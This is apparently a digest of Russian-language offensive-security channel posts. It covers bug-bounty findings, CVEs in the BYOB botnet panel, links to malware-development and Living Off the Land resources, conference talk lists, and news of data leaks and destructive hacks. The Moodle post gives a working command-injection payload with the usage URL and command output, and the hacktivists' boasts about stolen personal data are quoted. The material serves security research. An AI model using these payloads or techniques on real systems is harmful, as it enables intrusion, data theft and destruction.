Ringzer0 Training

Канал с воркшопами на разные темы.

— Initiation to Car Hacking: Discovering the CAN bus
— Compiler Backdooring For Beginners
— Rust Won't Save Us: Finding And Exploiting 0-Days In Security Appliances
— RISC V Exploit Dev Fun
— Reversing with Ghidra
— Hands-on Binary Deobfuscation
— A Journey into Malicious Code Tradecraft for Windows
— Bypassing Security Perimeters via Vulnerable Devices
— Introduction to Cryptography
— A Journey into Malicious Code Tradecraft for Windows

Ошибка Microsoft ценой в несколько тысяч долларов

Bingbot, поисковой бот от Microsoft, индексирует видео с разных сайтов: VK, Tiktok, Instagram, и Youtube, чтобы отображать их у себя в поиске.

Помимо самих видео, он парсит и их атрибуты, такие как название и описание. Если залить видео на хостинг, то бот, спустя некоторое время, получит его и начнет отдавать метадату по адресу https://www.bing.com/videos/vdasync?mid={mid}.

Эта метадата выглядит как обычный JSON, за которым, при открытии бинга, ходит браузер пользователя. Но вместо правильного applicarion/json, в ответе по этому адресу возвращается тип контента text/html; charset=utf-8.

Поэтому если в названии видео добавить полезную нагрузку с HTLM-тегами, бот ее успешно распарсит и захостит твою XSS-ку "как есть" на главном домене bing.com.

Баг был найден первого июля, а сумма выплаты составила $3000.

https://github.com/Whitecat18/Rust-for-Malware-Development/

Много примеров как писать offensive-утилиты на расте.

Содержимое
— Encryption Methods: AES/RC4/XOR
— Enumeration System
— Stomping injection
— InfoStealer
— Malware Tips: AMSI Bypass, LSASS Dump
— Persistence
— Process-Injection: Local/Remote
— Extract WiFi
— Reverse Shell
— Local/Remote Thread Hijacking
— Windows Threads
— DLL Injection
— Keylogger Dropper
— Shellcode Obfuscation and Deobfuscation
— Shellcode Execution Methods

Полезные ссылки
— Rust Book
— Windows API [old]-(winapi)
— Windows API (by Official Microsoft)
— NtAPI
— Windows Internals
— RedTeam Notes
— Malware Development Essentials
— Rust for CyberSecurity and Red Teaming

Не забываем и о предыдущих постах: как написать свой Cheat Engine на Rust, сниппеты кода для редтима.

https://github.com/projectdiscovery/tldfinder

У ICANN, организации которая координирует работу корневых DNS, существует список со всеми существующими Top Level доменами. Помимо привычных .com/.org/.net, в нем можно встретить и много необычных, о которых вы могли и не слышать, вроде .google, .gucci или .netflix, которыми управляют одноименные компании.

Вот 3 валидных примера:
— cloud.google
— design.google
— travel.google

Как говорил исследователь Jason Haddix на своем курсе Bug Hunter's Methodology Live Course:

За каждый домен .apex, который вы найдете, у вас в 4 раза больше шансов взломать цель

Чем больше TLD вы обнаружите, принадлежащих компании, тем больше вероятность того, что они содержат интересные уязвимости.

TLDFinder — новая утилита от Project Discovery и Mandiant создана специально, чтобы помочь вам в поисках таких доменов. Достаточно указать название компании, чтобы она нашла все необычные домены, которые принадлежат ей.

Использует пассивный сбор информации с сайтов Crtsh, netlas, bufferover, censys, github, dnsrepo, wayback machine.

Само исследование https://cloud.google.com/blog/topics/threat-intelligence/enumerating-private-tlds/

CVE-2024-45257

Плохая новость для любителей личных ботнетов: в byob, админке для управления агентами, нашли RCE.

Оригинальный репозиторий собрал почти 9 тысяч звезд на гитхабе, что делает этот C2 одним из самых популярных.

BYOB небезопасно сохраняет эксфильтрированные от агентов файлы. В частности, он использует функцию os.path.join, которая создает сценарии с Directory Traversal.

Вызов функции выглядит так

output_path = os.path.join(os.getcwd(), 'buildyourownbotnet/output', owner, 'files', filename)

Благодаря параметру filename, можно указать произвольный путь и записать собственный файл в произвольное место на диске.

Вторая уязвимость — само выполнение кода, которое стало возможным благодаря передаче пользовательского ввода в функцию subprocess.Popen().

Эта функция вызывается при генерации пэйлоада, а вызов API доступен без авторизации.

Баг удалось найти тому же исследователю, который в прошлый раз обнаружил SSRF в Havoc.

SSRFing the Web with the Help of Copilot Studio

У Microsoft существует сервис Copilot Studio, чтобы создавать AI боты. В ответ на фразу можно настроить HTTP-запрос, а в качестве URL — указать внутренний хост.

Классический SSRF, но кроме IMDS (сервис с метадатой), тут получилось обратиться к внутренней Cosmos DB на чтение и запись.

Так что если ищете баги в сервисах из Azure, имейте ввиду, что к ней можно обращаться и по HTTP, чтобы сделать красивый PoC в связке с ликнутыми токенами из IMDS.

https://blog.redteam-pentesting.de/2024/moodle-rce/

RCE в системе, которую любят использовать вузы во всем мире.

1. Создать вычисляемый вопрос
2. Изменить формулу ответа на

(1)->{system($_GET[chr(97)])}

3. Сохранить
4. Добавить к URL &a=id или любую другую команду

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>

<html  dir="ltr" lang="en" xml:lang="en">
<head>
    <title>Editing a Calculated question | Test</title>
[...]

OffSec анонсировали изменения для OSCP

Первое изменение. С 1 ноября 2024 года уберут бонусные баллы, которые можно было накопить, выполнив 80% упражнений для подготовки к экзамену на портале.

Цель OffSec — использовать материалы курса и обучение для подготовки к экзамену, а не использовать материалы курса и обучение как часть экзамена.

Раньше с помощью них можно было решить 3 Linux виртуалки и сдать экзамен, игнорируя часть с Active Directory. Теперь такое не сработает.

Взамен пообещали выдать стартовые креды для AD.

Второе изменение — теперь будут выдавать 2 сертификата: OSCP и OSCP+. После того, как ты сдал экзамен, тебе выдается премиальный OSCP+, который действует три года.

Если его не продлить, происходит даунгрейд до обычного OSCP, который активен всю жизнь и который можно проапгрейдить до OSCP+, повторно решив экзамен.

Знак "+" подчеркивает приверженность учащегося непрерывному обучению и стремлению оставаться в курсе событий в постоянно развивающейся области.

Конференция KazHackStan 2024.

Смотрим записи докладов, собрал самые интересные.

День 1. OSINT
— GEWEL: A structural approach to GEOINT
— Искусство цифровых расследований: фреймворк SOWEL
— OSINT: Недооценённые Dork-запросы
— Социальные графы против киберпреступности
— Obsidian, как саппорт в osint - расследованиях

День 2. Main
— Как взломать любого гражданина Республики Казахстан
— Как защитить Managed Services от RCE
— Разработка защищенных девайсов
— Не трейсингом единым: расследование современных атак на криптокошельки
— Preventing internal data leaks
— Step by Step to BugBounty: Process, Challenges and Solutions

Information Security
— Fighting deepfakes without analyzing the image
— DeFi Exploits and Hacks: реверсим блокчейн-экслоиты
— Android Hardening: закрываем целые классы уязвимостей
— Когда домен истек: превращаем пустяки в серьезную фишинговую угрозу
— Уязвимости банковских систем

Reverse/Malware
— Применение ИИ для анализа вредоносов
— Practical application of full homomorphic encryption for confidential smart contracts and training AI models on encrypted data
— System Persistence Methods Of The STA-2201
— Developing Resilient Detections (with Obfuscation & Evasion in Mind)
— Devirtualization of a protected KoiVM object
— Hacking Process Hacker 2

День 3.
— (|(MaLDAPtive:¯\_(LDAP)_/¯=ObFUsc8t10n) (De-Obfuscation &:=De*te)(!c=tion))
— Web2.5: Pentesting blockchain
— Nuclei Fu
— Security testing of financial services
— Red Team tales: Однажды на Red Team проекте...
— RedTeam: Abusing Google to fight Google
— Бесфайловые атаки: Как злоумышленники внедряют вредоносное ПО без следов на диске

В этом году простые, но сильные баги Web Cache Deception привлекли внимание и стали одними из самых популярных, — благодаря тому, что их легко эксплуатировать и часто это криты (об одном из таких в ChatGPT я рассказывал тут).

PortSwigger не остались в стороне и написали по ним свой собственный ресерч Gotta cache 'em all: bending the rules of web cache exploitation, рассказали о своих находках на Black Hat USA 2024, и выпустили лабы, чтобы разобраться самим "что да как".

Теория
Web cache deception Overview

Web caches
— Cache keys
— Cache rules

Constructing a web cache deception attack
— Using a cache buster
— Detecting cached responses

Exploiting static extension cache rules
— Path mapping discrepancies
— Exploiting path mapping discrepancies
— Delimiter discrepancies
— Exploiting delimiter discrepancies
— Delimiter decoding discrepancies
— Exploiting delimiter decoding discrepancies

Exploiting static directory cache rules
— Normalization discrepancies
— Detecting normalization by the origin server
— Detecting normalization by the cache server
— Exploiting normalization by the origin server
— Exploiting normalization by the cache server

Exploiting file name cache rules
— Detecting normalization discrepancies
— Exploiting normalization discrepancies

Preventing web cache deception vulnerabilities

Практика
— Exploiting path mapping for web cache deception
— Exploiting path delimiters for web cache deception
— Exploiting origin server normalization for web cache deception
— Exploiting cache server normalization for web cache deception
— Exploiting exact-match cache rules for web cache deception

Баг, через который можно угнать все машины от Kia

У Kia есть приложение Connect, через которое можно узнать где находится твоя машина, посигналить, а еще открыть ее и завести. Но как оно понимает, что это твоя машина, а не чужая?

После того, как ты купил Kia, дилер дает тебе ссылку, которая линкует машину с твоей учеткой для входа в само приложение.

Ссылка с одноразовым токеном ведет на сайт дилера. На этом же сайте из JS-кода можно найти эндпоинты, через которые дилер генерит эти ссылки, а еще запросы на то, чтобы управлять машиной.

Кроме того, ты сам можешь зарегаться как дилер, — этот эндпоинт был скрыт, но его получилось найти из-за того, что сайт дилера это форк клиентского API. И читать данные о владельцах чужих машин, а еще управлять ими.

Мораль такая: если ты покупаешь такую машину, помни, что она не становится твоей на 100%. У дилера, вендора и хакеров всегда остаются возможности угнать ее удаленно.

Living Off the Living Off the Land

Сборник всех сайтов, которые посвящены "жизни за счет земли" или процессу, суть которого — заиспользовать легитимные ресурсы, чтобы особо не палиться и злоупотребить ими.

О GTFOBins и LOLBAS вы уже наверняка все знаете, но возможности выходят далеко за их пределы. Все, что перечислено ниже, можно использовать в своих атаках, — вполне успешно и скрытно.

Классический LoTL:
— LOLBAS project — Windows
— GTFOBins — Linux
— LOOBins — MacOS

Extended LoTL:
— LOLAPPS — LoTL для 3th-party приложений, таких как VS Code и Discord
— Living Off The Land Drivers — драйвера для обхода средств безопасности и проведения атак
— LOTP — неочевидный RCE-By-Design в CLI-утилитах для разработки
— HijackLibs — проверенный список кандидатов для DLL Hijacking

Администрирование и виртуализация:
— LOLRMM — утилиты удаленного мониторинга и управления
— LOLESXi — скрипты и бинари из VMware ESXi
— LOFL — тактика, позволяющая не запускать бинари на скомпрометированных машинах, о которой я писал тут

Проекты от mrd0x:
— LOTS Project — легитимные сайты для фишинга и эксфильтрации
— MalAPI.io — список WinAPI-функций для Enumeration/Injection/Evasion
— FILESEC.IO — все типы файлов, которые могут быть полезны при атаках

Blue Team:
— WTFBin — GTFOBins и LOLBAS, но для синей команды и написания правил обнаружения
— bootloaders.io — курируемый список известных бутлоадеров
— LoLCerts — фингерпринты ликнутых сертификатов для подписи приложений, которые когда-либо утекали у крупных вендоров
— LOLBins CTI-Driven — наглядный MindMap с APT и компаниями, в которых участвовали те или иные бины

Другое:
— persistence-info — полусотня способов закрепиться в Windows
— LOTHardware — "железо", которое можно использовать для Red Team
— BYOL — пару слов о LoTL от Mandiant
— WADComs — интерактивная шпаргалка с готовыми командами для атак на AD

Хакеры из Silent Crow слили весь Росреестр и оставили небольшое "поздравление" с началом Нового года:

Это наш первый пост. Не так давно мы взломали и выгрузили базы данных "Росреестра", в котором хранилась вся персональная информация на каждого гражданина РФ.

Росреестр стал ярким примером того, как большие государственные структуры могут пасть за считанные дни. В результате их данные, казалось бы, надежно защищенные, попали в нашу коллекцию.

Если раньше "Росреестр" ассоциировался с бюрократическим хаосом, то теперь название сие структуры стало символом цифровой прозрачности — только не в том смысле, в котором россияне этого ожидали.

Размер опубликованного файла составляет около 46ГБ, а количество строк превышает 90 миллионов.

Мы решили слить малую часть. В полном же дампе количество составляет около 2,000,000,000 строк.

Каждая строка — это данные по пользователю, включая:
— ФИО;
— Адрес электронной почты;
— Номер телефона;
— Почтовый адрес;
— Данные паспорта (серия, номер, информация о выдаче);
— Дата рождения;
— СНИЛС.

В своем сообщении Silent Crow намекают на новые дампы

Следующий "рождественский подарок" не за горами, ожидайте интересных новостей.

NachoVPN 🌮🔒

доклад/слайды/исходники

Удобная наживка для любителей бесплатного VPN — позволяет моментально поднять свой Rogue VPN-сервер и получить SYSTEM сессию клюнувшего пользователя.

Работает все просто:
— есть VPN-клиенты, которые поддерживают post-connection скрипты с сервера (RCE by Design)
— многие из этих клиентов работают с повышенными привилегиями
— NachoVPN — это сервер, который может раздать твоего агента и сам скрипт
— юзер подключается к серверу — ты получаешь сессию

Еще есть клиенты, которые регистрируют свои URI-хэндлеры, чтобы пользователь мог подключиться в один клик — поэтому цели достаточно кликнуть по ссылке, чтобы клиент подтянул нагрузку.

Джеймс Кеттл, он же albinowax, он же "чайник", он же директор по исследованиям в PortSwigger, опубликовал список номинантов на конкурс "Top 10 web hacking techniques of 2024".

Каждый год исследователи безопасности со всего мира делятся своими последними находками в блогах, презентациях, PoC и whitepapers. Теперь настало время оглянуться на прорывы 2024 года и отметить наиболее влиятельные, изобретательные и многократно используемые исследования.

Самые крутые, по его мнению, ресерчи за 2024 год:
— Gotta cache 'em all: bending the rules of web cache exploitation
— Listen to the whispers: web timing attacks that actually work
— Splitting the email atom: exploiting parsers to bypass access controls
— Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!
— Insecurity through Censorship: Vulnerabilities Caused by The Great Firewall
— Bypassing WAFs with the phantom $Version cookie
— ChatGPT Account Takeover - Wildcard Web Cache Deception
— Why Code Security Matters - Even in Hardened Environments
— Remote Code Execution with Spring Properties
— Exploring the DOMPurify library: Bypasses and Fixes
— Bench Press: Leaking Text Nodes with CSS
— Source Code Disclosure in ASP.NET apps
— http-garden: Differential fuzzing REPL for HTTP implementations
— plORMbing your Prisma ORM with Time-based Attacks
— Introducing lightyear: a new way to dump PHP files
— The Ruby on Rails _json Juggling Attack
— Encoding Differentials: Why Charset Matters
— A Race to the Bottom - Database Transactions Undermining Your AppSec
— Response Filter Denial of Service (RFDoS): shut down a website by triggering WAF rule
— Unveiling TE.0 HTTP Request Smuggling: Discovering a Critical Vulnerability in Thousands of Google Cloud Websites
— DoubleClickjacking: A New Era of UI Redressing
— Devfile file write vulnerability in GitLab

Заявки все еще принимаются, а итоги будут подведены 4 февраля.

Facebook awards researcher $100,000 for finding bug that granted internal access

Ресерчер и блогер NahamSec рассказал о выплате в $100 000 за уязвимость в рекламном кабинете Meta. Один из серверов использовал headless-хром, через который исследователь смог эксплуатировать RCE и получить доступ к интранету.

“Рекламные онлайн-платформы представляют собой "сочные мишени", потому что "в процессе создания этих "объявлений" — будь то видео, текст или изображения — происходит очень многое“.

"Но в основе всего этого лежит обработка большого количества данных на стороне сервера, и это открывает двери для множества уязвимостей", — сказал NahamSec.

После присланного отчета, баг исправили за час.

Еще из архивов Meta, — Client Side CSRF.

Есть страница https://business.instagram.com/dashboard/12, где 12 — это идентификатор бизнеса. На этой странице есть JS-код, который берет идентификатор и отправляет из браузера юзера запрос

POST /[business_id]?fields=...
 access_token=...

Обычный CSRF, чтобы подделать запрос, тут бесполезен, так как спасает access_token, который является местной альтернативой CSRF-токена.

Зато нет валидации, что ID бизнеса — целое число, и это можно использовать. Вместо него, можно написать свой эндпоинт, к примеру https://business.instagram.com/dashboard/graphql?q=Mutation...&fields=..., чтобы клиентский код отправил

POST /graphql?q=Mutation...&fields=...
 access_token=...

и выполнил мутабельный запрос.

Плюсы способа в том, что:
— "обходится" Server-Side CSRF
— ссылка ведет на официальный сайт
— можно использовать с SameSite: Lax
— часто встречается в коде запросов для аналитики

Выплата составила $7500.

Красивое

Статическому анализатору на основе GPT-4 удалось найти RCE в плагине для Wordpress за пару секунд.

Чтобы попробовать самому, надо:
1. Склонировать репозиторий
2. Запустить сканер

nerve -G "openai://gpt-4" -T code_auditor -DTARGET_PATH=/path/to/code

Биржа госзакупок "Росэлторг" недоступна уже неделю

Пока разгневанные менеджеры штурмуют комментарии официального канала с требованием "вернуть доступ" и отправляют массовые жалобы в ФАС, владельцы пытаются замолчать очевидное и на протяжении уже нескольких дней повторяют мантру о "внеплановых работах".

Тем временем канал Yellow Drift "успокаивает" пострадавших

Молчание порождает вопросы, вымыслы и панику. А это никак не входило в наши планы. Наша цель, наоборот, четко прояснить где чье место и как работают причинно-следственные связи. Поддерживаете тиранию и спонсируете войны, готовьтесь возвращаться в каменный век.

Поясняем, Росэлторг не проводит временных технических работ. Росэлторг расхлебывает последствия ночной атаки и пытается восстановить 550 Тб утраченных данных: сервера, бэкапы, почты, сертификаты, сайт и прочую инфраструктуру федеральной площадки.

Предлагаем в освободившееся время от участия в торгах, подачи заявок и подготовки тендеров поразмышлять над жизнью. Гляди, может захочется что-то да и поменять в ней

Вместе с посланием хакеры приложили пруфы взлома в виде скриншотов скомпрометированного домена. По их словам, им удалось уничтожить 550 Тб данных, вместе с бэкапами.

Записи докладов с конференции Chaos Communication Congress, которая прошла в Германии с 27-30 декабря.

— Dude, Where's My Crypto? - Real World Impact of Weak Cryptocurrency Keys
— OMG WTF SSO - A beginner's guide to SSO (mis)configuration
— Attack Mining: How to use distributed sensors to identify and take down adversaries
— Hacking Life: How to decode and manipulate biological cells with AI
— Vulnerability management with DefectDojo
— Can We Find Beauty in Tax Fraud?
— we made a globally distributed DNS network for shits and giggles
— Dialing into the Past: RCE via the Fax Machine – Because Why Not?
— Security Nightmares
— What's inside my train ticket?

Всего больше 200 (!) видео, полный список тут.

burpference

Мощный апгрейд для Burp Suite — расширение собирает все In-Scope ссылки из истории запросов и отправляет их в LLM, чтобы тот помогал находить уязвимости.

— поддерживает Ollama, Anthropic, OpenAI, HuggingFace
— можно настроить отправку только в локальную модель

Расширение разработала команда Dreadnode, с одним из ресерчеров которой пару дней назад вышел подкаст от OWASP.